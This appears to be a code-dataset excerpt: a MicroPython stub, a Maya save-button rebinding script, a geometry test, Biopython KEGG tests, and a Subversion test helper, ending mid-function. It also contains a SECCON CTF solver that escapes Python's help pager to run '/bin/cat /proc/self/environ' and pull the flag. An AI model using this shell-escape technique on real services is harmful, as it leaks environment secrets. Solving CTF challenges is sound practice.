] | null | null | null | stubs/m5stack_flowui-v1_4_0-beta/flowlib/modules/_lego.py | mattytrentini/micropython-stubs | 4d596273823b69e9e5bcf5fa67f249c374ee0bbc | [
"MIT"
] | null | null | null | """
Module: 'flowlib.modules._lego' on M5 FlowUI v1.4.0-beta
"""
# MCU: (sysname='esp32', nodename='esp32', release='1.11.0', version='v1.11-284-g5d8e1c867 on 2019-08-30', machine='ESP32 module with ESP32')
# Stubber: 1.3.1 - updated
from typing import Any
ENCODER_ADDR = 4
class Lego:
""""""
class Lego_Motor:
""""""
M5GO_WHEEL_ADDR = 86
MOTOR_CTRL_ADDR = 0
i2c_bus = None
machine = None
module = None
motor1_pwm = 0
motor2_pwm = 0
os = None
time = None
ustruct = None
| 15.041096 | 141 | 0.58561 | """
Module: 'flowlib.modules._lego' on M5 FlowUI v1.4.0-beta
"""
# MCU: (sysname='esp32', nodename='esp32', release='1.11.0', version='v1.11-284-g5d8e1c867 on 2019-08-30', machine='ESP32 module with ESP32')
# Stubber: 1.3.1 - updated
from typing import Any
ENCODER_ADDR = 4
class Lego:
""""""
def deinit(self, *argv) -> Any:
pass
class Lego_Motor:
""""""
def _available(self, *argv) -> Any:
pass
def _read_encoder(self, *argv) -> Any:
pass
def deinit(self, *argv) -> Any:
pass
def position_update(self, *argv) -> Any:
pass
def read_encoder(self, *argv) -> Any:
pass
def run_distance(self, *argv) -> Any:
pass
def run_to(self, *argv) -> Any:
pass
def set_pwm(self, *argv) -> Any:
pass
def stop(self, *argv) -> Any:
pass
M5GO_WHEEL_ADDR = 86
MOTOR_CTRL_ADDR = 0
def const():
pass
def constrain():
pass
def dead_area():
pass
i2c_bus = None
machine = None
module = None
motor1_pwm = 0
motor2_pwm = 0
os = None
time = None
ustruct = None
| 269 | 0 | 339 |
dd73c4faa59f3a017ba4a70b99f0f13361952ac4 | 342 | py | Python | misc/hitchhike/solver/solver.py | SECCON/SECCON2021_online_CTF | 628008ae2d150723352aed2c95abff41501c51f2 | [
"Apache-2.0"
] | 7 | 2022-02-07T10:15:22.000Z | 2022-02-10T07:13:07.000Z | misc/hitchhike/solver/solver.py | SECCON/SECCON2021_online_CTF | 628008ae2d150723352aed2c95abff41501c51f2 | [
"Apache-2.0"
] | null | null | null | misc/hitchhike/solver/solver.py | SECCON/SECCON2021_online_CTF | 628008ae2d150723352aed2c95abff41501c51f2 | [
"Apache-2.0"
] | null | null | null | from ptrlib import *
import os
HOST = os.getenv('SECCON_HOST', "localhost")
PORT = os.getenv('SECCON_PORT', "10042")
sock = Socket(HOST, int(PORT))
sock.sendlineafter("value 2: ", "help()")
sock.sendlineafter("help> ", "+")
sock.sendlineafter("--More--", "!/bin/cat /proc/self/environ")
print(sock.recvregex("SECCON\{.+\}"))
sock.close()
| 22.8 | 62 | 0.666667 | from ptrlib import *
import os
HOST = os.getenv('SECCON_HOST', "localhost")
PORT = os.getenv('SECCON_PORT', "10042")
sock = Socket(HOST, int(PORT))
sock.sendlineafter("value 2: ", "help()")
sock.sendlineafter("help> ", "+")
sock.sendlineafter("--More--", "!/bin/cat /proc/self/environ")
print(sock.recvregex("SECCON\{.+\}"))
sock.close()
| 0 | 0 | 0 |
9f45c32bf8dc8611a369d873f426cb1bc5760aa4 | 908 | py | Python | startup/custom_save.py | ArtFXDev/silex_maya | 90ef3631a1b35656744deaf97b70b1a727fbc3d6 | [
"MIT"
] | 6 | 2021-08-29T19:24:49.000Z | 2022-03-07T03:59:42.000Z | startup/custom_save.py | ArtFXDev/silex_maya | 90ef3631a1b35656744deaf97b70b1a727fbc3d6 | [
"MIT"
] | 31 | 2021-09-17T14:16:55.000Z | 2022-03-31T19:52:27.000Z | startup/custom_save.py | ArtFXDev/silex_maya | 90ef3631a1b35656744deaf97b70b1a727fbc3d6 | [
"MIT"
] | 1 | 2021-12-10T03:17:58.000Z | 2021-12-10T03:17:58.000Z | import maya.cmds as cmds
import maya.mel as mel
| 31.310345 | 115 | 0.692731 | import maya.cmds as cmds
import maya.mel as mel
def custom_save():
save_cmd = "python(\"from silex_client.action.action_query import ActionQuery;ActionQuery('save').execute()\")"
# Hijack save button
cmds.iconTextButton(
u"saveSceneButton", edit=True, command=save_cmd, sourceType="mel"
)
# Hijack save menu item
# New in Maya 2009, we have to explicitly create the file menu before modifying it
mel.eval("buildFileMenu();")
cmds.setParent(u"mainFileMenu", menu=True)
cmds.menuItem(u"saveItem", edit=True, label="Save Scene", command=save_cmd)
# Create ctrl-s save command
cmds.nameCommand(u"NameComSave_File", annotation="silex save", command=save_cmd)
def reset_save():
cmds.nameCommand(
"NameComSave_File", annotation="silex save", command="file -save"
)
cmds.scriptJob(event=["quitApplication", reset_save])
| 836 | 0 | 23 |
c3c33a62d2bab0cee1173d76ded4852bb11c035d | 929 | py | Python | test/py/mapper/test10.py | Ahdhn/lar-cc | 7092965acf7c0c78a5fab4348cf2c2aa01c4b130 | [
"MIT",
"Unlicense"
] | 1 | 2021-06-10T02:06:27.000Z | 2021-06-10T02:06:27.000Z | test/py/mapper/test10.py | Ahdhn/lar-cc | 7092965acf7c0c78a5fab4348cf2c2aa01c4b130 | [
"MIT",
"Unlicense"
] | 1 | 2018-02-20T21:57:07.000Z | 2018-02-21T07:18:11.000Z | test/py/mapper/test10.py | Ahdhn/lar-cc | 7092965acf7c0c78a5fab4348cf2c2aa01c4b130 | [
"MIT",
"Unlicense"
] | 7 | 2016-11-04T10:47:42.000Z | 2018-04-10T17:32:50.000Z | """ Remove double instances of cells (and the unused vertices) """
from larlib import evalStruct
""" Generation of Struct object and transform to LAR model pair """
cubes = larCuboids([10,10,10],True)
V = cubes[0]
FV = cubes[1][-2]
CV = cubes[1][-1]
bcells = boundaryCells(CV,FV)
BV = [FV[f] for f in bcells]
VIEW(EXPLODE(1.2,1.2,1.2)(MKPOLS((V,BV))))
block = Model((V,BV))
struct = Struct(10*[block, t(10,0,0)])
struct = Struct(10*[struct, t(0,10,0)])
struct = Struct(3*[struct, t(0,0,10)])
W,FW = struct2lar(struct)
VIEW(EXPLODE(1.2,1.2,1.2)(MKPOLS((W,FW))))
""" Remove the double instances of cells """
cellDict = defaultdict(list)
for k,cell in enumerate(FW):
cellDict[tuple(cell)] += [k]
FW = [list(key) for key in cellDict.keys() if len(cellDict[key])==1]
VIEW(EXPLODE(1.2,1.2,1.2)(MKPOLS((W,FW))))
""" Remove the unused vertices """
print "len(W) =",len(W)
V,FV = larRemoveVertices(W,FW)
print "len(V) =",len(V)
| 27.323529 | 68 | 0.654467 | """ Remove double instances of cells (and the unused vertices) """
from larlib import evalStruct
""" Generation of Struct object and transform to LAR model pair """
cubes = larCuboids([10,10,10],True)
V = cubes[0]
FV = cubes[1][-2]
CV = cubes[1][-1]
bcells = boundaryCells(CV,FV)
BV = [FV[f] for f in bcells]
VIEW(EXPLODE(1.2,1.2,1.2)(MKPOLS((V,BV))))
block = Model((V,BV))
struct = Struct(10*[block, t(10,0,0)])
struct = Struct(10*[struct, t(0,10,0)])
struct = Struct(3*[struct, t(0,0,10)])
W,FW = struct2lar(struct)
VIEW(EXPLODE(1.2,1.2,1.2)(MKPOLS((W,FW))))
""" Remove the double instances of cells """
cellDict = defaultdict(list)
for k,cell in enumerate(FW):
cellDict[tuple(cell)] += [k]
FW = [list(key) for key in cellDict.keys() if len(cellDict[key])==1]
VIEW(EXPLODE(1.2,1.2,1.2)(MKPOLS((W,FW))))
""" Remove the unused vertices """
print "len(W) =",len(W)
V,FV = larRemoveVertices(W,FW)
print "len(V) =",len(V)
| 0 | 0 | 0 |
b7043aa5902dafc638468e7715efc6dcf2eddc85 | 9,668 | py | Python | Tests/test_KEGG_online.py | fredricj/biopython | 922063e5fec0b3c0c975f030b36eeea962e51091 | [
"BSD-3-Clause"
] | 2 | 2019-10-25T18:20:34.000Z | 2019-10-28T15:26:40.000Z | Tests/test_KEGG_online.py | fredricj/biopython | 922063e5fec0b3c0c975f030b36eeea962e51091 | [
"BSD-3-Clause"
] | null | null | null | Tests/test_KEGG_online.py | fredricj/biopython | 922063e5fec0b3c0c975f030b36eeea962e51091 | [
"BSD-3-Clause"
] | 1 | 2021-01-07T07:55:09.000Z | 2021-01-07T07:55:09.000Z | # Copyright 2014 by Kevin Wu.
# Copyright 2014 by Peter Cock.
# All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Tests for online functionality of the KEGG module."""
# Builtins
import unittest
from Bio.KEGG.KGML import KGML_parser
from Bio.KEGG.REST import kegg_conv, kegg_find, kegg_get
from Bio.KEGG.REST import kegg_info, kegg_link, kegg_list
from Bio import SeqIO
import requires_internet
requires_internet.check()
# TODO - revert to using with statements once we drop
# Python 2.6 and 2.7, see http://bugs.python.org/issue12487
class KEGGTests(unittest.TestCase):
"""Tests for KEGG REST API."""
class KGMLPathwayTests(unittest.TestCase):
"""Tests with metabolic maps."""
def test_parse_remote_pathway(self):
"""Download a KEGG pathway from the KEGG server and parse KGML."""
h = kegg_get("ko03070", "kgml")
pathway = KGML_parser.read(h)
self.assertEqual(pathway.name, "path:ko03070")
h.close()
if __name__ == "__main__":
runner = unittest.TextTestRunner(verbosity=2)
unittest.main(testRunner=runner)
| 33.453287 | 80 | 0.600434 | # Copyright 2014 by Kevin Wu.
# Copyright 2014 by Peter Cock.
# All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Tests for online functionality of the KEGG module."""
# Builtins
import unittest
from Bio.KEGG.KGML import KGML_parser
from Bio.KEGG.REST import kegg_conv, kegg_find, kegg_get
from Bio.KEGG.REST import kegg_info, kegg_link, kegg_list
from Bio import SeqIO
import requires_internet
requires_internet.check()
# TODO - revert to using with statements once we drop
# Python 2.6 and 2.7, see http://bugs.python.org/issue12487
class KEGGTests(unittest.TestCase):
"""Tests for KEGG REST API."""
def test_info_kegg(self):
h = kegg_info("kegg")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/info/kegg")
h.close()
def test_info_pathway(self):
h = kegg_info("pathway")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/info/pathway")
h.close()
def test_list_pathway(self):
h = kegg_list("pathway")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/list/pathway")
h.close()
def test_pathway_hsa(self):
h = kegg_list("pathway", "hsa")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/list/pathway/hsa")
h.close()
def test_list_organism(self):
h = kegg_list("organism")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/list/organism")
h.close()
def test_list_hsa(self):
h = kegg_list("hsa")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/list/hsa")
h.close()
def test_list_T01001(self):
h = kegg_list("T01001")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/list/T01001")
h.close()
def test_list_hsa_10458_plus_ece_Z5100(self):
h = kegg_list("hsa:10458+ece:Z5100")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/list/hsa:10458+ece:Z5100")
h.close()
def test_list_hsa_10458_list_ece_Z5100(self):
h = kegg_list(["hsa:10458", "ece:Z5100"])
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/list/hsa:10458+ece:Z5100")
h.close()
def test_list_cpd_C01290_plus_gl_G0009(self):
h = kegg_list("cpd:C01290+gl:G00092")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/list/cpd:C01290+gl:G00092")
h.close()
def test_list_cpd_C01290_list_gl_G0009(self):
h = kegg_list(["cpd:C01290", "gl:G00092"])
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/list/cpd:C01290+gl:G00092")
h.close()
def test_list_C01290_plus_G00092(self):
h = kegg_list("C01290+G00092")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/list/C01290+G00092")
h.close()
def test_list_C01290_list_G00092(self):
h = kegg_list(["C01290", "G00092"])
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/list/C01290+G00092")
h.close()
def test_find_genes_shiga_plus_toxin(self):
h = kegg_find("genes", "shiga+toxin")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/find/genes/shiga+toxin")
h.close()
def test_find_genes_shiga_list_toxin(self):
h = kegg_find("genes", ["shiga", "toxin"])
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/find/genes/shiga+toxin")
h.close()
def test_find_compound_C7H10O5_formula(self):
h = kegg_find("compound", "C7H10O5", "formula")
h.read()
self.assertEqual(h.url,
"http://rest.kegg.jp/find/compound/C7H10O5/formula")
h.close()
def test_find_compound_O5C7_formula(self):
h = kegg_find("compound", "O5C7", "formula")
h.read()
self.assertEqual(h.url,
"http://rest.kegg.jp/find/compound/O5C7/formula")
h.close()
def test_find_compound_exact_mass(self):
h = kegg_find("compound", "174.05", "exact_mass")
h.read()
self.assertEqual(h.url,
"http://rest.kegg.jp/find/compound/174.05/exact_mass")
h.close()
def test_find_compound_weight(self):
h = kegg_find("compound", "300-310", "mol_weight")
h.read()
self.assertEqual(h.url,
"http://rest.kegg.jp/find/compound/300-310/mol_weight")
h.close()
def test_get_cpd_C01290_plus_gl_G00092(self):
h = kegg_get("cpd:C01290+gl:G00092")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/get/cpd:C01290+gl:G00092")
h.close()
def test_get_cpd_C01290_list_gl_G00092(self):
h = kegg_get(["cpd:C01290", "gl:G00092"])
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/get/cpd:C01290+gl:G00092")
h.close()
def test_get_C01290_plus_G00092(self):
h = kegg_get(["C01290+G00092"])
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/get/C01290+G00092")
h.close()
def test_get_C01290_list_G00092(self):
h = kegg_get(["C01290", "G00092"])
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/get/C01290+G00092")
h.close()
def test_get_hsa_10458_plus_ece_Z5100(self):
h = kegg_get("hsa:10458+ece:Z5100")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/get/hsa:10458+ece:Z5100")
h.close()
def test_get_hsa_10458_list_ece_Z5100(self):
h = kegg_get(["hsa:10458", "ece:Z5100"])
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/get/hsa:10458+ece:Z5100")
h.close()
def test_get_hsa_10458_plus_ece_Z5100_as_aaseq(self):
h = kegg_get("hsa:10458+ece:Z5100", "aaseq")
self.assertEqual(h.url,
"http://rest.kegg.jp/get/hsa:10458+ece:Z5100/aaseq")
data = SeqIO.parse(h, "fasta")
self.assertEqual(len(list(data)), 2)
h.close()
def test_get_hsa_10458_list_ece_Z5100_as_aaseq(self):
h = kegg_get(["hsa:10458", "ece:Z5100"], "aaseq")
self.assertEqual(h.url,
"http://rest.kegg.jp/get/hsa:10458+ece:Z5100/aaseq")
data = SeqIO.parse(h, "fasta")
self.assertEqual(len(list(data)), 2)
h.close()
def test_get_hsa_10458_plus_ece_Z5100_as_ntseq(self):
h = kegg_get("hsa:10458+ece:Z5100", "ntseq")
self.assertEqual(h.url,
"http://rest.kegg.jp/get/hsa:10458+ece:Z5100/ntseq")
data = SeqIO.parse(h, "fasta")
self.assertEqual(len(list(data)), 2)
h.close()
def test_get_hsa_10458_list_ece_Z5100_as_ntseq(self):
h = kegg_get(["hsa:10458", "ece:Z5100"], "ntseq")
self.assertEqual(h.url,
"http://rest.kegg.jp/get/hsa:10458+ece:Z5100/ntseq")
data = SeqIO.parse(h, "fasta")
self.assertEqual(len(list(data)), 2)
h.close()
def test_get_hsa05130_image(self):
h = kegg_get("hsa05130", "image")
data = h.read()
self.assertEqual(data[:4], b"\x89PNG")
self.assertEqual(h.url, "http://rest.kegg.jp/get/hsa05130/image")
h.close()
def test_conv_eco_ncbi_geneid(self):
h = kegg_conv("eco", "ncbi-geneid")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/conv/eco/ncbi-geneid")
h.close()
def test_conv_ncbi_geneid_eco(self):
h = kegg_conv("ncbi-geneid", "eco")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/conv/ncbi-geneid/eco")
h.close()
def test_conv_ncbi_gi_hsa_10458_plus_ece_Z5100(self):
h = kegg_conv("ncbi-gi", "hsa:10458+ece:Z5100")
h.read()
self.assertEqual(h.url,
"http://rest.kegg.jp/conv/ncbi-gi/hsa:10458+ece:Z5100")
h.close()
def test_conv_ncbi_gi_hsa_10458_list_ece_Z5100(self):
h = kegg_conv("ncbi-gi", ["hsa:10458", "ece:Z5100"])
h.read()
self.assertEqual(h.url,
"http://rest.kegg.jp/conv/ncbi-gi/hsa:10458+ece:Z5100")
h.close()
def test_link_pathway_hsa(self):
h = kegg_link("pathway", "hsa")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/link/pathway/hsa")
h.close()
def test_link_hsa_pathway(self):
h = kegg_link("hsa", "pathway")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/link/hsa/pathway")
h.close()
def test_pathway_hsa_10458_plus_ece_Z5100(self):
h = kegg_link("pathway", "hsa:10458+ece:Z5100")
h.read()
self.assertEqual(h.url,
"http://rest.kegg.jp/link/pathway/hsa:10458+ece:Z5100")
h.close()
def test_pathway_hsa_10458_list_ece_Z5100(self):
h = kegg_link("pathway", ["hsa:10458", "ece:Z5100"])
h.read()
self.assertEqual(h.url,
"http://rest.kegg.jp/link/pathway/hsa:10458+ece:Z5100")
h.close()
class KGMLPathwayTests(unittest.TestCase):
"""Tests with metabolic maps."""
def test_parse_remote_pathway(self):
"""Download a KEGG pathway from the KEGG server and parse KGML."""
h = kegg_get("ko03070", "kgml")
pathway = KGML_parser.read(h)
self.assertEqual(pathway.name, "path:ko03070")
h.close()
if __name__ == "__main__":
runner = unittest.TextTestRunner(verbosity=2)
unittest.main(testRunner=runner)
| 7,420 | 0 | 1,026 |
1c0ae2e2d38eb776d925bd91481af85cd42b69f5 | 22,148 | py | Python | subversion/tests/cmdline/svntest/verify.py | ruchirarya/svn | 81502a213251c2af21361a942bd9a8cd7d3adb9f | [
"Apache-2.0"
] | 7 | 2018-01-18T06:13:21.000Z | 2020-07-09T03:46:16.000Z | depe/subversion/subversion/tests/cmdline/svntest/verify.py | louis-tru/TouchCode2 | 91c182aeaa37fba16e381ea749d32906dab1aeea | [
"BSD-3-Clause-Clear"
] | 4 | 2015-01-12T22:23:41.000Z | 2015-01-12T22:33:52.000Z | src/subversion/subversion/tests/cmdline/svntest/verify.py | schwern/alien-svn | 7423b08f9bc4fdf0ac0d7ea53495269b21b3e8f9 | [
"Apache-2.0"
] | 1 | 2020-11-04T07:25:22.000Z | 2020-11-04T07:25:22.000Z | #
# verify.py: routines that handle comparison and display of expected
# vs. actual output
#
# Subversion is a tool for revision control.
# See http://subversion.tigris.org for more information.
#
# ====================================================================
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
######################################################################
import re, sys
from difflib import unified_diff, ndiff
import pprint
import logging
import svntest
logger = logging.getLogger()
######################################################################
# Exception types
class SVNUnexpectedOutput(svntest.Failure):
"""Exception raised if an invocation of svn results in unexpected
output of any kind."""
pass
class SVNUnexpectedStdout(SVNUnexpectedOutput):
"""Exception raised if an invocation of svn results in unexpected
output on STDOUT."""
pass
class SVNUnexpectedStderr(SVNUnexpectedOutput):
"""Exception raised if an invocation of svn results in unexpected
output on STDERR."""
pass
class SVNExpectedStdout(SVNUnexpectedOutput):
"""Exception raised if an invocation of svn results in no output on
STDOUT when output was expected."""
pass
class SVNExpectedStderr(SVNUnexpectedOutput):
"""Exception raised if an invocation of svn results in no output on
STDERR when output was expected."""
pass
class SVNUnexpectedExitCode(SVNUnexpectedOutput):
"""Exception raised if an invocation of svn exits with a value other
than what was expected."""
pass
class SVNIncorrectDatatype(SVNUnexpectedOutput):
"""Exception raised if invalid input is passed to the
run_and_verify_* API"""
pass
class SVNDumpParseError(svntest.Failure):
"""Exception raised if parsing a dump file fails"""
pass
######################################################################
# Comparison of expected vs. actual output
def createExpectedOutput(expected, output_type, match_all=True):
"""Return EXPECTED, promoted to an ExpectedOutput instance if not
None. Raise SVNIncorrectDatatype if the data type of EXPECTED is
not handled."""
if isinstance(expected, list):
expected = ExpectedOutput(expected)
elif isinstance(expected, str):
expected = RegexOutput(expected, match_all)
elif isinstance(expected, int):
expected = RegexOutput(".*: E%d:.*" % expected, False)
elif expected is AnyOutput:
expected = AnyOutput()
elif expected is not None and not isinstance(expected, ExpectedOutput):
raise SVNIncorrectDatatype("Unexpected type for '%s' data" % output_type)
return expected
class ExpectedOutput(object):
"""Matches an ordered list of lines.
If MATCH_ALL is True, the expected lines must match all the actual
lines, one-to-one, in the same order. If MATCH_ALL is False, the
expected lines must match a subset of the actual lines, one-to-one,
in the same order, ignoring any other actual lines among the
matching ones.
"""
def __init__(self, expected, match_all=True):
"""Initialize the expected output to EXPECTED which is a string, or
a list of strings.
"""
assert expected is not None
self.expected = expected
self.match_all = match_all
def matches(self, actual):
"""Return whether SELF matches ACTUAL (which may be a list
of newline-terminated lines, or a single string).
"""
assert actual is not None
expected = self.expected
if not isinstance(expected, list):
expected = [expected]
if not isinstance(actual, list):
actual = [actual]
if self.match_all:
return expected == actual
i_expected = 0
for actual_line in actual:
if expected[i_expected] == actual_line:
i_expected += 1
if i_expected == len(expected):
return True
return False
def display_differences(self, message, label, actual):
"""Show the differences between the expected and ACTUAL lines. Print
MESSAGE unless it is None, the expected lines, the ACTUAL lines,
and a diff, all labeled with LABEL.
"""
display_lines(message, self.expected, actual, label, label)
display_lines_diff(self.expected, actual, label, label)
class AnyOutput(ExpectedOutput):
"""Matches any non-empty output.
"""
class RegexOutput(ExpectedOutput):
"""Matches a single regular expression.
If MATCH_ALL is true, every actual line must match the RE. If
MATCH_ALL is false, at least one actual line must match the RE. In
any case, there must be at least one line of actual output.
"""
def __init__(self, expected, match_all=True):
"EXPECTED is a regular expression string."
assert isinstance(expected, str)
ExpectedOutput.__init__(self, expected, match_all)
self.expected_re = re.compile(expected)
class RegexListOutput(ExpectedOutput):
"""Matches an ordered list of regular expressions.
If MATCH_ALL is True, the expressions must match all the actual
lines, one-to-one, in the same order. If MATCH_ALL is False, the
expressions must match a subset of the actual lines, one-to-one, in
the same order, ignoring any other actual lines among the matching
ones.
In any case, there must be at least one line of actual output.
"""
def __init__(self, expected, match_all=True):
"EXPECTED is a list of regular expression strings."
assert isinstance(expected, list) and expected != []
ExpectedOutput.__init__(self, expected, match_all)
self.expected_res = [re.compile(e) for e in expected]
class UnorderedOutput(ExpectedOutput):
"""Matches an unordered list of lines.
The expected lines must match all the actual lines, one-to-one, in
any order.
"""
class UnorderedRegexListOutput(ExpectedOutput):
"""Matches an unordered list of regular expressions.
The expressions must match all the actual lines, one-to-one, in any
order.
Note: This can give a false negative result (no match) when there is
an actual line that matches multiple expressions and a different
actual line that matches some but not all of those same
expressions. The implementation matches each expression in turn to
the first unmatched actual line that it can match, and does not try
all the permutations when there are multiple possible matches.
"""
class AlternateOutput(ExpectedOutput):
"""Matches any one of a list of ExpectedOutput instances.
"""
def __init__(self, expected, match_all=True):
"EXPECTED is a list of ExpectedOutput instances."
assert isinstance(expected, list) and expected != []
assert all(isinstance(e, ExpectedOutput) for e in expected)
ExpectedOutput.__init__(self, expected)
######################################################################
# Displaying expected and actual output
def display_trees(message, label, expected, actual):
'Print two trees, expected and actual.'
if message is not None:
logger.warn(message)
if expected is not None:
logger.warn('EXPECTED %s:', label)
svntest.tree.dump_tree(expected)
if actual is not None:
logger.warn('ACTUAL %s:', label)
svntest.tree.dump_tree(actual)
def display_lines_diff(expected, actual, expected_label, actual_label):
"""Print a unified diff between EXPECTED (labeled with EXPECTED_LABEL)
and ACTUAL (labeled with ACTUAL_LABEL).
Each of EXPECTED and ACTUAL is a string or a list of strings.
"""
if not isinstance(expected, list):
expected = [expected]
if not isinstance(actual, list):
actual = [actual]
logger.warn('DIFF ' + expected_label + ':')
for x in unified_diff(expected, actual,
fromfile='EXPECTED ' + expected_label,
tofile='ACTUAL ' + actual_label):
logger.warn('| ' + x.rstrip())
def display_lines(message, expected, actual,
expected_label, actual_label=None):
"""Print MESSAGE, unless it is None, then print EXPECTED (labeled
with EXPECTED_LABEL) followed by ACTUAL (labeled with ACTUAL_LABEL).
Each of EXPECTED and ACTUAL is a string or a list of strings.
"""
if message is not None:
logger.warn(message)
if type(expected) is str:
expected = [expected]
if type(actual) is str:
actual = [actual]
if actual_label is None:
actual_label = expected_label
if expected is not None:
logger.warn('EXPECTED %s:', expected_label)
for x in expected:
logger.warn('| ' + x.rstrip())
if actual is not None:
logger.warn('ACTUAL %s:', actual_label)
for x in actual:
logger.warn('| ' + x.rstrip())
def compare_and_display_lines(message, label, expected, actual,
raisable=None):
"""Compare two sets of output lines, and print them if they differ,
preceded by MESSAGE iff not None. EXPECTED may be an instance of
ExpectedOutput (and if not, it is wrapped as such). ACTUAL may be a
list of newline-terminated lines, or a single string. RAISABLE is an
exception class, an instance of which is thrown if ACTUAL doesn't
match EXPECTED."""
if raisable is None:
raisable = svntest.main.SVNLineUnequal
### It'd be nicer to use createExpectedOutput() here, but its
### semantics don't match all current consumers of this function.
assert expected is not None
assert actual is not None
if not isinstance(expected, ExpectedOutput):
expected = ExpectedOutput(expected)
if isinstance(actual, str):
actual = [actual]
actual = svntest.main.filter_dbg(actual)
if not expected.matches(actual):
expected.display_differences(message, label, actual)
raise raisable
def verify_outputs(message, actual_stdout, actual_stderr,
expected_stdout, expected_stderr, all_stdout=True):
"""Compare and display expected vs. actual stderr and stdout lines:
if they don't match, print the difference (preceded by MESSAGE iff
not None) and raise an exception.
If EXPECTED_STDERR or EXPECTED_STDOUT is a string the string is
interpreted as a regular expression. For EXPECTED_STDOUT and
ACTUAL_STDOUT to match, every line in ACTUAL_STDOUT must match the
EXPECTED_STDOUT regex, unless ALL_STDOUT is false. For
EXPECTED_STDERR regexes only one line in ACTUAL_STDERR need match."""
expected_stderr = createExpectedOutput(expected_stderr, 'stderr', False)
expected_stdout = createExpectedOutput(expected_stdout, 'stdout', all_stdout)
for (actual, expected, label, raisable) in (
(actual_stderr, expected_stderr, 'STDERR', SVNExpectedStderr),
(actual_stdout, expected_stdout, 'STDOUT', SVNExpectedStdout)):
if expected is None:
continue
if isinstance(expected, RegexOutput):
raisable = svntest.main.SVNUnmatchedError
elif not isinstance(expected, AnyOutput):
raisable = svntest.main.SVNLineUnequal
compare_and_display_lines(message, label, expected, actual, raisable)
def verify_exit_code(message, actual, expected,
raisable=SVNUnexpectedExitCode):
"""Compare and display expected vs. actual exit codes:
if they don't match, print the difference (preceded by MESSAGE iff
not None) and raise an exception."""
if expected != actual:
display_lines(message, str(expected), str(actual), "Exit Code")
raise raisable
# A simple dump file parser. While sufficient for the current
# testsuite it doesn't cope with all valid dump files.
# One day we may need to parse individual property name/values into a map
def compare_dump_files(message, label, expected, actual):
"""Parse two dump files EXPECTED and ACTUAL, both of which are lists
of lines as returned by run_and_verify_dump, and check that the same
revisions, nodes, properties, etc. are present in both dumps.
"""
parsed_expected = DumpParser(expected).parse()
parsed_actual = DumpParser(actual).parse()
if parsed_expected != parsed_actual:
raise svntest.Failure('\n' + '\n'.join(ndiff(
pprint.pformat(parsed_expected).splitlines(),
pprint.pformat(parsed_actual).splitlines())))
| 34.28483 | 81 | 0.675411 | #
# verify.py: routines that handle comparison and display of expected
# vs. actual output
#
# Subversion is a tool for revision control.
# See http://subversion.tigris.org for more information.
#
# ====================================================================
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
######################################################################
import re, sys
from difflib import unified_diff, ndiff
import pprint
import logging
import svntest
logger = logging.getLogger()
######################################################################
# Exception types
class SVNUnexpectedOutput(svntest.Failure):
"""Exception raised if an invocation of svn results in unexpected
output of any kind."""
pass
class SVNUnexpectedStdout(SVNUnexpectedOutput):
"""Exception raised if an invocation of svn results in unexpected
output on STDOUT."""
pass
class SVNUnexpectedStderr(SVNUnexpectedOutput):
"""Exception raised if an invocation of svn results in unexpected
output on STDERR."""
pass
class SVNExpectedStdout(SVNUnexpectedOutput):
"""Exception raised if an invocation of svn results in no output on
STDOUT when output was expected."""
pass
class SVNExpectedStderr(SVNUnexpectedOutput):
"""Exception raised if an invocation of svn results in no output on
STDERR when output was expected."""
pass
class SVNUnexpectedExitCode(SVNUnexpectedOutput):
"""Exception raised if an invocation of svn exits with a value other
than what was expected."""
pass
class SVNIncorrectDatatype(SVNUnexpectedOutput):
"""Exception raised if invalid input is passed to the
run_and_verify_* API"""
pass
class SVNDumpParseError(svntest.Failure):
"""Exception raised if parsing a dump file fails"""
pass
######################################################################
# Comparison of expected vs. actual output
def createExpectedOutput(expected, output_type, match_all=True):
"""Return EXPECTED, promoted to an ExpectedOutput instance if not
None. Raise SVNIncorrectDatatype if the data type of EXPECTED is
not handled."""
if isinstance(expected, list):
